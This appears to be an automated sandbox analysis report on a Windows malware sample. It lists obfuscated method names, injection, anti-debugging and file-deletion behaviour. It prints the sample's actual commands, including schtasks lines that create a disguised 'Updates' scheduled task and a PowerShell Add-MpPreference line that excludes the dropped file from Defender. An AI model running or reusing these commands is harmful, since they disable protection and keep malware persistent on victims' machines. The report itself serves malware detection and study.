Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, rTRrKV40MvHNxVQdUU.cs | High entropy of concatenated method names: 'Dispose', 'OJHWj8oaeF', 't7LCfvP7Ex', 'sLvZZuEbCQ', 'fSjWxMw8HG', 'hniWzR7Wjw', 'ProcessDialogKey', 'BmFCQiBYCS', 'R4mCW0L0l6', 'OgBCCvCjXX'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.72d0000.8.raw.unpack, LOLFrAUKCM9pfdPLF8.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HJ0Cj8iMH3', 'OL1Cx0VXq3', 'GCcCzDcbvp', 'mWc6QG4VIw', 'sWb6W3VO0y', 'EMe6CwL22k', 'I3T66vy9VE', 'TJImKqVVNdYL36lXKwM'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, cSV1GKxEAhjmpZLsTQ.cs | High entropy of concatenated method names: 'nqrnUxOuKL', 'Q17nbFQZmK', 'dPX8tQ0HDV', 'r4d89rDqTI', 'uDR8hl9Il0', 'L9g8YEZQvH', 'DiW8ISgaN3', 'F9A8iPG6Cw', 'Yhm8TZpnr7', 'XiD8LxS7g6'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, DMkA9oaR6DgC7I9lJ9.cs | High entropy of concatenated method names: 'QhGWkstgXc', 'PWDW0nJRFj', 'PmuWeTS5kr', 'Ty4WFAx6oC', 'qXpW4yZR7i', 'GpYW5OSv6n', 'wDeif9fwC44nr9rdcP', 'vcc40eFBBuk1YBLfLZ', 'WDhWWntX24', 'yF0W6k8Z79'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, bfNUKDLC05VYSm2F1I.cs | High entropy of concatenated method names: 'IRG73t3YB8', 'BJM7f8oYpv', 'lUl7tEvlMA', 'pqX79lsSgL', 'l1G7qNx52W', 'XJ77hgR2wm', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, bBuRmgX3jyALrIBCiGg.cs | High entropy of concatenated method names: 'qRWmNrOmJC', 'HELmRywESZ', 'ge1m1sG6VL', 'GA9mVbRPxd', 'rlumUcH88y', 'VssmgdJ0gB', 'EFfmbqK4WD', 'CwWmcHTibc', 'E46mXbXxod', 'zvOmScSDWJ'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, iIqs66MIvsUPMvbDnA.cs | High entropy of concatenated method names: 'Bdr1fkiok', 'l3eV4pa21', 'BdEgukXNi', 'FwZbVdvRF', 'Qq7XWduyU', 'tmMSe0B7R', 'H1SiBTXpY4craaEa9t', 'jfrp41qv7OsyjgD2G7', 'vXt7PU4Vr', 'TKpJLgkuA'
Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, VOtjQPVEeDTvgrqiGw.cs | High entropy of concatenated method names: 'uin7EmsHcp', 'B1f7PX7YJb', 'weK78CS9qc', 'PgW7n0gqwt', 'DlW7A2YFMc', 'LHN7kiysPh', 'vRr70skDVd', 'LPn7rHGZvD', 'XbL7ePXQHo', 'DOm7FOWwfb'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, F1oTOmXkHGy1hMPSZsu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OfqJqWSvaO', 'i3iJw3jr9n', 'smtJBmyKSx', 'vc8JvhdyuG', 'HskJlcNnXT', 'P2ZJMlIxmA', 'acDJHXdp1u'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, vkpNRGnA86RNO8h5Hh.csHigh entropy of concatenated method names: 'TSkAsWVRgS', 'CR2APUjviu', 'alyAnPvo9J', 'Jp8AkPQgWq', 'MjcA0RLUDr', 'dvtnl3dujx', 'WEpnMImwbP', 'VAAnHr2loj', 'EYkn2Do45V', 'MCEnjnAdSL'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, gM7HF6pf6lrBLxHo57.csHigh entropy of concatenated method names: 'VHr6s0Ryq5', 'N8Y6ERuNUK', 'Hpv6PrVUtB', 'EEb68Q0ZmN', 'r3n6n2DTv7', 'U3t6AbJtKv', 'KZp6k70XT9', 'Wn060b2WQp', 'G1H6rFPsNq', 'UGD6eiRB0W'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, ctZSyfZLhhlxY9sntK.csHigh entropy of concatenated method names: 'AQj8VFQbhZ', 'cvq8gt2pUq', 'TAC8clGl0G', 'idE8X4FHJF', 'hom84JQAX5', 'NZx85ZsNGV', 'JFL8G1Sc6a', 'DCW87GL8e7', 'VXg8mHgxMQ', 'RJD8JnnDgu'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, qEr0wKBfcaKhGsHbJ2.csHigh entropy of concatenated method names: 'ufFucJ4yS3', 'gjFuXZbPTr', 'mx1u3SJW5s', 'wd4ufUdvvI', 'YIfu9tAnUL', 'sxAuhjfflm', 'K5xuI8s6iZ', 'sN9uiA9xJp', 'zY3uLsEb6K', 'VZAuDaLOSV'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, IZ0PG98klAYTO2NgNR.csHigh entropy of concatenated method names: 'M1n4LfOu6H', 'kXo4OksJlU', 'CN64qOfNF5', 'KxK4wFZZSP', 'r4M4fSYXph', 'Q124tf3BUR', 'Gjm49SYDHR', 'vE84hl2w8a', 'lud4YcFKMS', 'NMP4IhWMJb'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, Gy5jhpHyHbOrqjj4n9.csHigh entropy of concatenated method names: 'OfamWCtXfE', 'PNCm6MNFlw', 'jW2md1besu', 'BtLmE9sRUI', 'H11mP8PEZ2', 'ae8mnuF6Z9', 'nyGmAovdHb', 'bdm7HiuTn3', 'Fac72MUEBV', 'xJ07jayc5J'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, PpYJNMfTau1IasRZRx.csHigh entropy of concatenated method names: 'Jc4Pq9L41C', 'kZZPwKo2hH', 'KhnPBPZARX', 'DFgPvuW9fw', 'kVKPlMdJe8', 'vSPPMwySn0', 'T4HPH7fItN', 'Vl0P2J8XIT', 'dk7Pj8GdZv', 'P0LPx9LT33'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, DpaETKN4IkAWyGJvgW.csHigh entropy of concatenated method names: 'hFLkNuyGQt', 'ulwkR362YY', 'Xy9k1vmviG', 'yqekVuRZZt', 'evIkULOT8q', 'dygkgPwA7r', 'dAykbpvojh', 'Nd4kc4DnTu', 'i7NkXBp9Y5', 's2xkSGsObZ'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, qvVJ051RsW5USawOuS.csHigh entropy of concatenated method names: 'RDuG2WjES1', 'R7eGxoe1y6', 'bvV7QEvdo9', 'itm7Wa5cFs', 'gp2GDV0lF4', 'sQBGOOE9Ct', 'APGGpv3H98', 'XAPGqNQ3rH', 'rNVGwIPwkg', 'Uv8GBhymRc'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, QW0XatPbBAbeUdR2lN.csHigh entropy of concatenated method names: 'ToString', 'nhG5Dv4MwH', 'YK85fXhCwD', 'Ecj5t0vPVC', 'YNC59Jrlpq', 'eJj5hy5EEN', 'jdY5YA8XWd', 'KM55IuUkJr', 'Y2x5iK1O5C', 'zuY5TdPobE'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, rTRrKV40MvHNxVQdUU.csHigh entropy of concatenated method names: 'Dispose', 'OJHWj8oaeF', 't7LCfvP7Ex', 'sLvZZuEbCQ', 'fSjWxMw8HG', 'hniWzR7Wjw', 'ProcessDialogKey', 'BmFCQiBYCS', 'R4mCW0L0l6', 'OgBCCvCjXX'
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe.3eebfb0.4.raw.unpack, LOLFrAUKCM9pfdPLF8.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HJ0Cj8iMH3', 'OL1Cx0VXq3', 'GCcCzDcbvp', 'mWc6QG4VIw', 'sWb6W3VO0y', 'EMe6CwL22k', 'I3T66vy9VE', 'TJImKqVVNdYL36lXKwM'
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeCode function: 14_2_004063C6 ShellExecuteW,URLDownloadToFileW,14_2_004063C6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exeFile created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeJump to dropped file

          Boot Survival

          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_00418A00

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Code function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,14_2_0041A8DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

Source: Yara match - File source: Process Memory Space: bmkNCLNkqvOpVZ.exe PID: 1616, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0040E18D Sleep,ExitProcess, 14_2_0040E18D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: FA0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: 2D50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: 2C50000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: 9250000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: A250000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: A460000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: B460000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: 11B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: 30D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: 2ED0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: 9030000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: A030000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: A250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory allocated: B250000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 14_2_004186FE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 6823
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Window / User API: threadDelayed 2778
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Window / User API: threadDelayed 509
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Window / User API: threadDelayed 9485
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - API coverage: 5.0 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 572 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5368 - Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808 - Thread sleep count: 509 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808 - Thread sleep time: -1527000s >= -30000s
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808 - Thread sleep count: 9485 > 30
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe TID: 6808 - Thread sleep time: -28455000s >= -30000s
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe TID: 5908 - Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe - Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 14_2_0041A01B
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 14_2_0040B28E
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 14_2_0040838E
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 14_2_004087A0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 14_2_00407848
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004068CD FindFirstFileW,FindNextFileW, 14_2_004068CD
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0044BA59 FindFirstFileExA, 14_2_0044BA59
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 14_2_0040AA71
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 14_2_00417AAB
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 14_2_0040AC78
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 14_2_00406D28
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554169284.0000000000CDA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554426544.0000000000D36000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_004327AE
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 14_2_0041A8DA
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004407B5 mov eax, dword ptr fs:[00000030h] 14_2_004407B5
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 14_2_00410763
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004328FC SetUnhandledExceptionFilter, 14_2_004328FC
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 14_2_004398AC
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 14_2_00432D5C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Memory written: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Memory written: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 14_2_00410B5C
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004175E1 mouse_event, 14_2_004175E1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpB7C4.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe"
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\bmkNCLNkqvOpVZ" /XML "C:\Users\user\AppData\Local\Temp\tmpC65B.tmp"
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Process created: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe "C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe"
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program ManagerG
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program ManagerB
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554426544.0000000000D29000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: |Program Manager|
Source: SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe, 00000008.00000002.4554348687.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Program Manager:
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: 14_2_004329DA cpuid 14_2_004329DA
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: EnumSystemLocalesW, 14_2_0044F17B
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: EnumSystemLocalesW, 14_2_0044F130
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: EnumSystemLocalesW, 14_2_0044F216
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_0044F2A3
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetLocaleInfoA, 14_2_0040E2BB
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetLocaleInfoW, 14_2_0044F4F3
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 14_2_0044F61C
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetLocaleInfoW, 14_2_0044F723
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 14_2_0044F7F0
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: EnumSystemLocalesW, 14_2_00445914
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: GetLocaleInfoW, 14_2_00445E1C
Source: C:\Users\user\AppData\Roaming\bmkNCLNkqvOpVZ.exe - Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 14_2_0044EEB8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.21416.15434.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
